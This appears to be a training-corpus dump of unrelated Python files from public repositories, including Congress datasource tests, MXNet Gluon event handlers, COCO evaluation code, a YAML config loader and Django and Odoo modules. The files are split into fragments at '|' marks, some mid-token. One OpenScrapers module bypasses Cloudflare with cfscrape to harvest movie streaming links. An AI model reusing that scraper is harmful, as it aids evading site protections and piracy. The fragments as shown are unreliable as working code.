def test_get_datasources2(self):
req1 = self._get_datasource_request()
req1['name'] = 'datasource1'
result1 = self.ds_manager.add_datasource(req1)
req2 = self._get_datasource_request()
req2['name'] = 'datasource2'
result2 = self.ds_manager.add_datasource(req2)
# check results of add_datasource
for key, value in req1.items():
self.assertEqual(value, result1[key])
for key, value in req2.items():
self.assertEqual(value, result2[key])
# check services actually on dseNode
services = self.dseNode.get_services()
self.assertEqual(len(services), 2)
self.assertEqual(set([s.service_id for s in services]),
set(['datasource1', 'datasource2']))
self.assertIsInstance(services[0],
fake_datasource.FakeDataSource)
self.assertIsInstance(services[1],
fake_datasource.FakeDataSource)
# check results of get_datasources
resultall = self.dseNode.get_datasources()
self.assertEqual(len(resultall), 2)
# check equality except for 'id' field
byname = {x['name']: x for x in resultall}
for x in byname.values():
del(x['id'])
self.assertEqual(byname, {'datasource1': req1, 'datasource2': req2})
def test_get_datasources_hide_secret(self):
req = self._get_datasource_request()
self.ds_manager.add_datasource(req)
result = self.dseNode.get_datasources(filter_secret=True)
result = result[0]
# check equality except that 'config'/'password' is hidden
req['co
|
nfig']['password'] = "<hidden>"
del(result['id'])
self.assertEqual(result, req)
def test_create_datasource_duplicate_name(self):
req = self._get_datasource_request()
self.ds_manager.add_datasource(req)
self.assertRaises(congressException.DatasourceNameInUse,
self.ds_manager.add_datasource, req)
def tes
|
t_delete_datasource(self):
req = self._get_datasource_request()
result = self.ds_manager.add_datasource(req)
self.ds_manager.delete_datasource(result)
# check that service is actually deleted
services = self.dseNode.get_services()
self.assertEqual(len(services), 0)
self.assertRaises(
congressException.NotFound, self.dseNode.invoke_service_rpc,
req['name'], 'get_status', {'source_id': None, 'params': None})
# TODO(thinrichs): test that we've actually removed
# the row from the DB
# TODO(dse2): this test relies on coordination between dseNode and
# policy engine. Much harder in distributed system. Need to decide
# if we want that kind of invariant and if so implement it.
# def test_delete_datasource_error(self):
# req = self._get_datasource_request()
# req['driver'] = 'fake_datasource'
# req['config'] = {'auth_url': 'foo',
# 'username': 'armax',
# 'password': 'password',
# 'tenant_name': 'armax'}
# # let driver generate this for us.
# del req['id']
# result = self.datasource_mgr.add_datasource(req)
# engine = self.dseNode.service_object('engine')
# engine.create_policy('alice')
# engine.insert('p(x) :- %s:q(x)' % req['name'], 'alice')
# self.assertRaises(exception.DanglingReference,
# self.datasource_mgr.delete_datasource,
# result['id'])
def test_delete_invalid_datasource(self):
req = self._get_datasource_request()
req['id'] = 'fake-id'
self.assertRaises(congressException.DatasourceNotFound,
self.ds_manager.delete_datasource, req)
# TODO(dse2): Doesn't seem like we need this (or it will be moved to API).
# def test_get_driver_schema(self):
# schema = self.datasource_mgr.get_driver_schema(
# 'fake_datasource')
# self.assertEqual(
|
leezu/mxnet
|
python/mxnet/gluon/contrib/estimator/event_handler.py
|
Python
|
apache-2.0
| 33,227
| 0.002889
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
# pylint: disable=wildcard-import, unused-argument, too-many-ancestors
"""Gluon EventHandlers for Estimators"""
import os
import time
import warnings
import numpy as np
from ...metric import CompositeEvalMetric, EvalMetric
from ...metric import Loss as metric_loss
from .utils import _check_metrics
__all__ = ['TrainBegin', 'TrainEnd', 'EpochBegin', 'EpochEnd', 'BatchBegin', 'BatchEnd',
'StoppingHandler', 'MetricHandler', 'ValidationHandler',
'LoggingHandler', 'CheckpointHandler', 'EarlyStoppingHandler', 'GradientUpdateHandler']
class EventHandler(object):
pass
def _check_event_handlers(handlers):
if isinstance(handlers, EventHandler):
handlers = [handlers]
else:
handlers = handlers or []
if not all([isinstance(handler, EventHandler) for handler in handlers]):
raise ValueError("handlers must be an EventHandler or a list of EventHandler, "
"got: {}".format(handlers))
return handlers
class TrainBegin(EventHandler):
def train_begin(self, estimator, *args, **kwargs):
pass
class TrainEnd(EventHandler):
def train_end(self, estimator, *args, **kwargs):
pass
class EpochBegin(EventHandler):
def epoch_begin(self, estimator, *args, **kwargs):
pass
class EpochEnd(EventHandler):
def epoch_end(self, estimator, *args, **kwargs):
return False
class BatchBegin(EventHandler):
def batch_begin(self, estimator, *args, **kwargs):
pass
class BatchEnd(EventHandler):
def batch_end(self, estimator, *args, **kwargs):
return False
class StoppingHandler(TrainBegin, BatchEnd, EpochEnd):
"""Stop conditions to stop training
Stop training if maximum number of batches or epochs
reached.
Parameters
----------
max_epoch : int, default None
Number of maximum epochs to train.
max_batch : int, default None
Number of maximum batches to train.
"""
def __init__(self, max_epoch=None, max_batch=None):
self.max_epoch = max_epoch
self.max_batch = max_batch
self.current_batch = 0
self.current_epoch = 0
self.stop_training = False
def train_begin(self, estimator, *args, **kwargs):
self.max_epoch = estimator.max_epoch
self.max_batch = estimator.max_batch
self.current_batch = 0
self.current_epoch = 0
|
def batch_end(self, estimator, *args, **kwargs):
self.current_batch += 1
if self.current_batch == self.max_batch:
self.stop_training = True
|
return self.stop_training
def epoch_end(self, estimator, *args, **kwargs):
self.current_epoch += 1
if self.current_epoch == self.max_epoch:
self.stop_training = True
return self.stop_training
class MetricHandler(EpochBegin, BatchEnd):
"""Metric Handler that update metric values at batch end
:py:class:`MetricHandler` takes model predictions and true labels
and update the metrics, it also update metric wrapper for loss with loss values.
Validation loss and metrics will be handled by :py:class:`ValidationHandler`
Parameters
----------
metrics : List of EvalMetrics
Metrics to be updated at batch end.
priority : scalar
Priority level of the MetricHandler. Priority level is sorted in ascending
order. The lower the number is, the higher priority level the handler is.
"""
def __init__(self, metrics, priority=-1000):
self.metrics = _check_metrics(metrics)
# order to be called among all callbacks
# metrics need to be calculated before other callbacks can access them
self.priority = priority
def epoch_begin(self, estimator, *args, **kwargs):
for metric in self.metrics:
metric.reset()
def batch_end(self, estimator, *args, **kwargs):
pred = kwargs['pred']
label = kwargs['label']
loss = kwargs['loss']
for metric in self.metrics:
if isinstance(metric, metric_loss):
# metric wrapper for loss values
metric.update(0, loss)
else:
metric.update(label, pred)
class ValidationHandler(TrainBegin, BatchEnd, EpochEnd):
"""Validation Handler that evaluate model on validation dataset
:py:class:`ValidationHandler` takes validation dataset, an evaluation function,
metrics to be evaluated, and how often to run the validation. You can provide custom
evaluation function or use the one provided my :py:class:`Estimator`
Parameters
----------
val_data : DataLoader
Validation data set to run evaluation.
eval_fn : function
A function defines how to run evaluation and
calculate loss and metrics.
epoch_period : int, default 1
How often to run validation at epoch end, by default
:py:class:`ValidationHandler` validate every epoch.
batch_period : int, default None
How often to run validation at batch end, by default
:py:class:`ValidationHandler` does not validate at batch end.
priority: scalar, default -1000
Priority level of the ValidationHandler. Priority level is sorted in
ascending order. The lower the number is, the higher priority level the
handler is.
event_handlers : EventHandler or list of EventHandlers
List of :py:class:`EventHandler` to apply during validaiton. This argument
is used by self.eval_fn function in order to process customized event
handlers.
"""
def __init__(self,
val_data,
eval_fn,
epoch_period=1,
batch_period=None,
priority=-1000,
event_handlers=None):
self.val_data = val_data
self.eval_fn = eval_fn
self.epoch_period = epoch_period
self.batch_period = batch_period
self.current_batch = 0
self.current_epoch = 0
# order to be called among all callbacks
# validation metrics need to be calculated before other callbacks can access them
self.priority = priority
self.event_handlers = event_handlers
def train_begin(self, estimator, *args, **kwargs):
# reset epoch and batch counter
self.current_batch = 0
self.current_epoch = 0
def batch_end(self, estimator, *args, **kwargs):
self.current_batch += 1
if self.batch_period and self.current_batch % self.batch_period == 0:
self.eval_fn(val_data=self.val_data, batch_axis=estimator.batch_axis,
event_handlers=self.event_handlers)
def epoch_end(self, estimator, *args, **kwargs):
self.current_epoch += 1
if self.epoch_period and self.current_epoch % self.epoch_period == 0:
self.eval_fn(val_data=self.val_data, batch_axis=estimator.batch_axis,
event_handlers=self.event_handlers)
class LoggingHandler(TrainBegin, TrainEnd, EpochBegin, EpochEnd, BatchBegin, BatchEnd):
"""Basic Logging Handler that applies to every Gluon estimator by default.
:py:class:`LoggingHandler` logs hyper-parameters, training statistics,
and other useful information during training
Parameters
----------
log_interval: int or str, defau
|
mrrodd/Samples
|
DLR-IronPython/IronPython.UI/Scripts/SampleScript02.py
|
Python
|
lgpl-3.0
| 1,026
| 0.024366
|
import clr
clr.AddReference("mscorlib")
clr.AddReference("PresentationFramework")
from System.Windows import Application
from System.IO import StreamReader
from System.Threading import Thread
from System.Windows.Markup import XamlReader
from System.Reflection import Assembly
from System import Action
class ViewModel:
numberOfSpeakers = 0
def __init__(self, speakers):
self.numberOfSpeakers = speakers
def getNumberOfSpeakers():
vm = ViewModel(Application.Current.MainWindow.DataContext.Speakers.Length)
stream = Application.Current.GetType().Assembly.GetManifestResourceStream(
"IronPython.UI.Scripts.ResultWindow.xaml")
reader = StreamReader(stream)
window = XamlReader.Parse(reader.ReadToEnd())
reader.Close()
stream.Close()
window.D
|
ataContext = vm
window.FindName("CloseButton").Click += lambda s, e: window.Close()
window.Show()
Application.Current.Dispatcher.BeginInvoke(Action(lambda: getNumberOfSpeakers()))
for i in range(0, 10):
print str(i+1)
|
Thread.Sleep(500)
print "Done!"
|
adlermedrado/abbr
|
setup.py
|
Python
|
apache-2.0
| 1,346
| 0
|
# Copyright 2016 Adler Brediks Medrado
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing p
|
ermissions and
# limitations under the License.
from setuptools import setup, find_packages
with open("requirements.txt") as reqs:
install_requires = reqs.readlines()
setup(
name="abbr",
version="0.0.1"
|
,
url="https://github.com/adlermedrado/abbr",
author="Adler Brediks Medrado",
author_email="abbr@adlermedrado.com.br",
license="Apache-2.0",
description="A client library to abbreviate string contents",
long_description=open('README.rst').read(),
packages=find_packages(),
install_requires=install_requires,
include_package_data=True,
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
],
)
|
rishita/mxnet
|
example/rcnn/rcnn/pycocotools/cocoeval.py
|
Python
|
apache-2.0
| 19,780
| 0.009757
|
__author__ = 'tsungyi'
from __future__ import print_function
import numpy as np
import datetim
|
e
import time
from collections import defaultdict
import mask
import copy
class COCOe
|
val:
# Interface for evaluating detection on the Microsoft COCO dataset.
#
# The usage for CocoEval is as follows:
# cocoGt=..., cocoDt=... # load dataset and results
# E = CocoEval(cocoGt,cocoDt); # initialize CocoEval object
# E.params.recThrs = ...; # set parameters as desired
# E.evaluate(); # run per image evaluation
# E.accumulate(); # accumulate per image results
# E.summarize(); # display summary metrics of results
# For example usage see evalDemo.m and http://mscoco.org/.
#
# The evaluation parameters are as follows (defaults in brackets):
# imgIds - [all] N img ids to use for evaluation
# catIds - [all] K cat ids to use for evaluation
# iouThrs - [.5:.05:.95] T=10 IoU thresholds for evaluation
# recThrs - [0:.01:1] R=101 recall thresholds for evaluation
# areaRng - [...] A=4 object area ranges for evaluation
# maxDets - [1 10 100] M=3 thresholds on max detections per image
# useSegm - [1] if true evaluate against ground-truth segments
# useCats - [1] if true use category labels for evaluation # Note: if useSegm=0 the evaluation is run on bounding boxes.
# Note: if useCats=0 category labels are ignored as in proposal scoring.
# Note: multiple areaRngs [Ax2] and maxDets [Mx1] can be specified.
#
# evaluate(): evaluates detections on every image and every category and
# concats the results into the "evalImgs" with fields:
# dtIds - [1xD] id for each of the D detections (dt)
# gtIds - [1xG] id for each of the G ground truths (gt)
# dtMatches - [TxD] matching gt id at each IoU or 0
# gtMatches - [TxG] matching dt id at each IoU or 0
# dtScores - [1xD] confidence of each dt
# gtIgnore - [1xG] ignore flag for each gt
# dtIgnore - [TxD] ignore flag for each dt at each IoU
#
# accumulate(): accumulates the per-image, per-category evaluation
# results in "evalImgs" into the dictionary "eval" with fields:
# params - parameters used for evaluation
# date - date evaluation was performed
# counts - [T,R,K,A,M] parameter dimensions (see above)
# precision - [TxRxKxAxM] precision for every evaluation setting
# recall - [TxKxAxM] max recall for every evaluation setting
# Note: precision and recall==-1 for settings with no gt objects.
#
# See also coco, mask, pycocoDemo, pycocoEvalDemo
#
# Microsoft COCO Toolbox. version 2.0
# Data, paper, and tutorials available at: http://mscoco.org/
# Code written by Piotr Dollar and Tsung-Yi Lin, 2015.
# Licensed under the Simplified BSD License [see coco/license.txt]
def __init__(self, cocoGt=None, cocoDt=None):
'''
Initialize CocoEval using coco APIs for gt and dt
:param cocoGt: coco object with ground truth annotations
:param cocoDt: coco object with detection results
:return: None
'''
self.cocoGt = cocoGt # ground truth COCO API
self.cocoDt = cocoDt # detections COCO API
self.params = {} # evaluation parameters
self.evalImgs = defaultdict(list) # per-image per-category evaluation results [KxAxI] elements
self.eval = {} # accumulated evaluation results
self._gts = defaultdict(list) # gt for evaluation
self._dts = defaultdict(list) # dt for evaluation
self.params = Params() # parameters
self._paramsEval = {} # parameters for evaluation
self.stats = [] # result summarization
self.ious = {} # ious between all gts and dts
if not cocoGt is None:
self.params.imgIds = sorted(cocoGt.getImgIds())
self.params.catIds = sorted(cocoGt.getCatIds())
def _prepare(self):
'''
Prepare ._gts and ._dts for evaluation based on params
:return: None
'''
#
def _toMask(objs, coco):
# modify segmentation by reference
for obj in objs:
t = coco.imgs[obj['image_id']]
if type(obj['segmentation']) == list:
if type(obj['segmentation'][0]) == dict:
print('debug')
obj['segmentation'] = mask.frPyObjects(obj['segmentation'],t['height'],t['width'])
if len(obj['segmentation']) == 1:
obj['segmentation'] = obj['segmentation'][0]
else:
# an object can have multiple polygon regions
# merge them into one RLE mask
obj['segmentation'] = mask.merge(obj['segmentation'])
elif type(obj['segmentation']) == dict and type(obj['segmentation']['counts']) == list:
obj['segmentation'] = mask.frPyObjects([obj['segmentation']],t['height'],t['width'])[0]
elif type(obj['segmentation']) == dict and \
type(obj['segmentation']['counts'] == unicode or type(obj['segmentation']['counts']) == str):
pass
else:
raise Exception('segmentation format not supported.')
p = self.params
if p.useCats:
gts=self.cocoGt.loadAnns(self.cocoGt.getAnnIds(imgIds=p.imgIds, catIds=p.catIds))
dts=self.cocoDt.loadAnns(self.cocoDt.getAnnIds(imgIds=p.imgIds, catIds=p.catIds))
else:
gts=self.cocoGt.loadAnns(self.cocoGt.getAnnIds(imgIds=p.imgIds))
dts=self.cocoDt.loadAnns(self.cocoDt.getAnnIds(imgIds=p.imgIds))
if p.useSegm:
_toMask(gts, self.cocoGt)
_toMask(dts, self.cocoDt)
self._gts = defaultdict(list) # gt for evaluation
self._dts = defaultdict(list) # dt for evaluation
for gt in gts:
self._gts[gt['image_id'], gt['category_id']].append(gt)
for dt in dts:
self._dts[dt['image_id'], dt['category_id']].append(dt)
self.evalImgs = defaultdict(list) # per-image per-category evaluation results
self.eval = {} # accumulated evaluation results
def evaluate(self):
'''
Run per image evaluation on given images and store results (a list of dict) in self.evalImgs
:return: None
'''
tic = time.time()
print('Running per image evaluation... ')
p = self.params
p.imgIds = list(np.unique(p.imgIds))
if p.useCats:
p.catIds = list(np.unique(p.catIds))
p.maxDets = sorted(p.maxDets)
self.params=p
self._prepare()
# loop through images, area range, max detection number
catIds = p.catIds if p.useCats else [-1]
computeIoU = self.computeIoU
self.ious = {(imgId, catId): computeIoU(imgId, catId) \
for imgId in p.imgIds
for catId in catIds}
evaluateImg = self.evaluateImg
maxDet = p.maxDets[-1]
self.evalImgs = [evaluateImg(imgId, catId, areaRng, maxDet)
for catId in catIds
for areaRng in p.areaRng
for imgId in p.imgIds
]
self._paramsEval = copy.deepcopy(self.params)
toc = time.time()
print('DONE (t=%0.2fs).'%(toc-tic))
def computeIoU(self, imgId, catId):
p = self.params
if p.useCats:
gt = self._gts[imgId,catId]
dt = self._dts[imgId,catId]
else:
gt = [_ for cId in p.catIds for _ in self._gts[imgId,cId]]
dt = [_ for cId in p.catIds for _ in self._dts[imgId,cId]]
if len(gt) == 0 and len(dt) ==0:
return []
dt = sorted(dt, key=lambda x: -x['s
|
hiaselhans/OpenGlider
|
tests/visual_test_flatten_glider.py
|
Python
|
gpl-3.0
| 4,457
| 0.004487
|
#! /usr/bin/python2
# -*- coding: utf-8; -*-
#
# (c) 2013 booya (http://booya.at)
#
# This file is part of the OpenGlider project.
#
# OpenGlider is free software; you can
|
redistribute it and/or mo
|
dify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# OpenGlider is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with OpenGlider. If not, see <http://www.gnu.org/licenses/>.
import os
import random
import sys
import unittest
from openglider.plots.glider.cell import flattened_cell
try:
import openglider
except ImportError:
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(sys.argv[0]))))
import openglider
import openglider.graphics
import openglider.plots
from test_glider import GliderTestClass
testfolder = os.path.dirname(os.path.abspath(__file__))
importpath = testfolder+"/demokite.ods"
class TestGlider_Flatten(GliderTestClass):
def setUp(self, complete=False):
super(TestGlider_Flatten, self).setUp(complete=complete)
def get_flattened_cell(self, allowance=0.02):
cell = self.glider.cells[random.randint(0, len(self.glider.cells)-1)]
left_bal, left, right, right_bal = flattened_cell(cell)
left_out = left.copy()
right_out = right.copy()
left_out.add_stuff(-allowance)
right_out.add_stuff(allowance)
return left_out, left, right, right_out
def showcut(self, num):
""""""
left_out, left, right, right_out = self.get_flattened_cell()
cuts_front = [random.random()*len(left)*0.1 for __ in range(2)]
cuts_back = [(random.random()+1)*len(left)*0.2 for __ in range(2)]
outlist_1, leftcut, rightcut = openglider.plots.cuts[num]([[left, cuts_front[0]], [right, cuts_front[1]]],
left_out, right_out, -0.02)
outlist_2, leftcut_2, rightcut_2 = openglider.plots.cuts[num]([[left, cuts_back[0]], [right, cuts_back[1]]],
left_out, right_out, 0.02)
cuts = [left_out[leftcut:leftcut_2], outlist_1, right_out[rightcut:rightcut_2], outlist_2]
marks = [left[cuts_front[0]:cuts_back[0]], right[cuts_front[1]:cuts_back[1]]]
openglider.graphics.Graphics2D([openglider.graphics.Line(thalist) for thalist in cuts] +
[openglider.graphics.Point(thalist) for thalist in marks])
def test_cut1(self):
self.showcut(0)
def test_cut2(self):
self.showcut(1)
def test_cut3(self):
self.showcut(2)
def test_mirror(self):
left_out, left, right, right_out = self.get_flattened_cell()
mirrored_left = left_out.copy()
mirrored_right = right_out.copy()
p1 = mirrored_left.data[-1].copy()
p2 = mirrored_right.data[-1].copy()
#print(mirrored_left.data[-1])
mirrored_left.mirror(p1, p2)
mirrored_right.mirror(p1, p2)
openglider.graphics.Graphics2D([openglider.graphics.Line(left_out.data),
openglider.graphics.Line(right_out.data),
openglider.graphics.Green,
openglider.graphics.Line(mirrored_left.data),
openglider.graphics.Line(mirrored_right.data)
])
def test_flattened_glider(self):
parts = openglider.plots.flatten_glider(self.glider)
all = parts['panels']
all.join(parts['ribs'])
layers = {}
for part in all.parts:
for name, layer in part.layers.iteritems():
layers.setdefault(name, [])
layers[name] += layer
openglider.graphics.Graphics3D([openglider.graphics.Line(l) for l in layers['OUTER_CUTS']] +
[openglider.graphics.Red] +
[openglider.graphics.Line(l) for l in layers['SEWING_MARKS']])
if __name__ == '__main__':
unittest.main(verbosity=2)
|
Benxxen/pythonwetter
|
pythonwetter/serializers.py
|
Python
|
mit
| 385
| 0.007792
|
__author__ = 'McDaemon'
from models import Weather
from rest_framework import serializers
cla
|
ss WeatherSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Weather
fields = ('datum', 'stadt', 'anbieter', 'anbieter', 'wetter', 'tagestemperatur', 'einheit', 'kondition',
|
'windgeschwindigkeit', 'windrichtung', 'url')
|
klen/muffin-example
|
example/manage.py
|
Python
|
mit
| 817
| 0.001224
|
"""Setup the application's CLI commands."""
from example import app, db
@app.manage
def hello(name, upper=False):
"""Write command help text here.
:param name: W
|
rite your name
:param upper: Use uppercase
"""
greetings = f"Hello {name}!"
if upper:
greetings = greetings.upper()
print(greetings)
@app.manage
async def example_users():
"""Create users for the example."""
from example.models import User
async with
|
db.connection():
await User.get_or_create(email='user@muffin.io', defaults={
'username': 'user', 'password': User.generate_password('pass'),
})
await User.get_or_create(email='admin@muffin.io', defaults={
'username': 'admin', 'password': User.generate_password('pass'), 'is_super': True,
})
|
Onirik79/aaritmud
|
src/socials/social_eyebrow.py
|
Python
|
gpl-2.0
| 98
| 0.010204
|
# -*-
|
coding: utf-8
|
-*-
def social_eyebrow(entity, argument):
return True
#- Fine Funzione -
|
RNAcentral/rnacentral-import-pipeline
|
rnacentral_pipeline/cli/cpat.py
|
Python
|
apache-2.0
| 1,587
| 0
|
# -*- coding: utf-8 -*-
"""
Copyright [2009-2021] EMBL-European Bioinformatics Institute
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITION
|
S OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pathlib import Path
import pickle
import click
from rnacentral_pipeline.cpat import parser
|
from rnacentral_pipeline.cpat.data import CpatWriter
from rnacentral_pipeline.writers import build
@click.group("cpat")
def cli():
"""
Commands with processing the Rfam metadata.
"""
pass
@cli.command("parse")
@click.argument("cutoffs", type=click.File("rb"))
@click.argument("model_name")
@click.argument("results", type=click.Path())
@click.argument("output", type=click.Path())
def parse(cutoffs, model_name, results, output):
cutoffs = pickle.load(cutoffs)
data = parser.parse(cutoffs, model_name, Path(results))
with build(CpatWriter, Path(output)) as wtr:
wtr.write(data)
@cli.command("generate-cutoffs")
@click.argument("data-folder", type=click.Path())
@click.argument("output", type=click.File("wb"))
def generate_cutoffs(data_folder, output):
cutoffs = parser.cutoffs(Path(data_folder))
pickle.dump(cutoffs, output)
|
diogocs1/comps
|
web/addons/account/wizard/account_report_common_partner.py
|
Python
|
apache-2.0
| 1,999
| 0.004502
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class account_common_partner_report(osv.osv_memory):
_name = 'account.common.partner.report'
_description = 'Account Common Partner Report'
_inherit = "account.common.report"
_columns = {
'result_selection': fields.selection([('customer','Receivable Accounts'),
('supplier','Payable Accounts'),
|
('customer_supplier','Receivable and Payable Accounts')],
"Partner's", required=True),
}
_defaults = {
'result_selection
|
': 'customer',
}
def pre_print_report(self, cr, uid, ids, data, context=None):
if context is None:
context = {}
data['form'].update(self.read(cr, uid, ids, ['result_selection'], context=context)[0])
return data
#vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
hglattergotz/sfdeploy
|
bin/config.py
|
Python
|
mit
| 2,796
| 0.002146
|
"""
Configuration tasks
This module provides tools to load yaml configuration files.
"""
import os
from fabric.api import *
from fabric.contrib.console import confirm
from fabric.colors import red, green
try:
import yaml
except ImportError:
print(red('pyYaml module not installed. Run the following commands to install it:', bold=True))
print(green(' curl -O http://pyyaml.org/download/pyyaml/PyYAML-3.10.tar.gz'))
print(green(' tar -xzf PyYAML-3.10.tar.gz'))
print(green(' cd PyYAML-3.10'))
print(green(' python setup.py install'))
print(green(' cd ..'))
print(green(' rm -rf PyYAML-3.10.tar.gz PyYAML-3.10'))
exit(1)
def load_yaml(path):
"""
Load a yaml file located at 'path' and return the content as a dictionary.
If the yaml file does not exist an empty dictionary will be returned.
"""
if os.path.exists(path):
f = open(path)
data = yaml.load(f)
f.close()
return data
else:
# This should maybe throw an exception or something
return {}
def load_yaml_config(path, env = ''):
"""
Load an environment aware yaml configuration file into a dictionary.
If a configuration depends on the target of the deployment it is possible
to pass the name of the environment to this function (env). In such a case
the yaml configuration file must look like this:
all:
key1: defaultValue1
:
prod:
key1: prod_value1
key2: prod_value2
:
dev:
key1: dev_value1
key2: dev_value2
:
'all' is the default that will be returned if no env value is passed.
'prod' and 'dev' in the above example are the names of the environments
present in this f
|
ile.
Calling the function with 'prod' as the value for env will return the key/
value pairs from the 'all' section with the values from the 'prod' section
overriding any that might have been loaded from the all
|
section.
"""
config = load_yaml(path)
if config:
if 'all' in config:
all = config['all']
else:
return {}
if env != '':
if env in config:
all.update(config[env])
return all
else:
return {}
return config
def load_settings(path):
"""
Take given file path and return dictionary of any key=value pairs found.
Copy and paste from fabric project's main.py.
"""
if os.path.exists(path):
comments = lambda s: s and not s.startswith("#")
settings = filter(comments, open(path, 'r'))
return dict((k.strip(), v.strip()) for k, _, v in
[s.partition('=') for s in settings])
# Handle nonexistent or empty settings file
return {}
|
asteca/ASteCA
|
packages/update_progress.py
|
Python
|
gpl-3.0
| 553
| 0
|
import sys
def updt(total, progress, extra=""):
"""
Displays or updates a console progress bar.
Original source: https://stackoverflow.com/a/15860757/1391441
"""
barLength, status = 20, ""
progress = float(
|
progress) / float(total)
if progress >= 1.:
progress, status = 1, "\r\n"
block = int(round(barLength * progr
|
ess))
text = "\r[{}] {:.0f}% {}{}".format(
"#" * block + "-" * (barLength - block),
round(progress * 100, 0), extra, status)
sys.stdout.write(text)
sys.stdout.flush()
|
repotvsupertuga/tvsupertuga.repository
|
script.module.openscrapers/lib/openscrapers/sources_openscrapers/en/coolmoviezone.py
|
Python
|
gpl-2.0
| 2,749
| 0.001091
|
# -*- coding: utf-8 -*-
# ..#######.########.#######.##....#..######..######.########....###...########.#######.########..######.
# .##.....#.##.....#.##......###...#.##....#.##....#.##.....#...##.##..##.....#.##......##.....#.##....##
# .##.....#.##.....#.##......####..#.##......##......##.....#..##...##.##.....#.##......##.....#.##......
# .##.....#.########.######..##.##.#..######.##......########.##.....#.########.######..########..######.
# .##.....#.##.......##......##..###.......#.##......##...##..########.##.......##......##...##........##
# .##.....#.##.......##......##...##.##....#.##....#.##....##.##.....#.##.......##......##....##.##....##
# ..#######.##.......#######.##....#..######..######.##.....#.##.....#.##.......#######.##.....#..######.
'''
OpenScrapers Project
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re
from openscrapers.modules import cleantitle, source_utils, cfscrape
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.domains = ['coolmoviezone.online']
self.base_link = 'https://coolmoviezone.online'
self.scraper = cfscrape.create_scraper()
def movie(self, imdb, title, localtitle, aliases, year):
try:
title = cleantitle.geturl(title)
url = self.base_link + '/%s-%s' % (title, year)
|
return url
except:
return
def sources(self, url, hostDict
|
, hostprDict):
try:
sources = []
r = self.scraper.get(url).content
match = re.compile('<td align="center"><strong><a href="(.+?)"').findall(r)
for url in match:
host = url.split('//')[1].replace('www.', '')
host = host.split('/')[0].split('.')[0].title()
quality = source_utils.check_sd_url(url)
sources.append({'source': host, 'quality': quality, 'language': 'en', 'url': url, 'direct': False,
'debridonly': False})
except Exception:
return
return sources
def resolve(self, url):
return url
|
gdebure/cream
|
projects/migrations/0004_project_status.py
|
Python
|
gpl-3.0
| 466
| 0
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration
|
(migrations.Migration):
dependencies = [
('projects', '0003_auto_20150618_1121'),
]
operations = [
migrations.AddField(
model_name='project',
|
name='status',
field=models.ForeignKey(default='a', to='projects.ProjectStatus'),
preserve_default=False,
),
]
|
clinton-hall/nzbToMedia
|
libs/common/babelfish/__init__.py
|
Python
|
gpl-3.0
| 761
| 0.003942
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2013 the BabelFish authors. All rights reserved.
# Use of this source c
|
ode is governed by the 3-clause BSD license
# that can be found in the LICENSE file.
#
import sys
if sys.version_info[0] >= 3:
basestr = str
else:
basestr = basestring
from .converters import (LanguageConverter, LanguageReverseConverter, LanguageEquivalenceConverter, CountryConverter,
CountryReverseConverter)
from .country import country_converters, COUNTRIES, COUNTRY_MATRIX, Country
from .excep
|
tions import Error, LanguageConvertError, LanguageReverseError, CountryConvertError, CountryReverseError
from .language import language_converters, LANGUAGES, LANGUAGE_MATRIX, Language
from .script import SCRIPTS, SCRIPT_MATRIX, Script
|
edwar/repositio.com
|
ProyectoDeGrado/forms.py
|
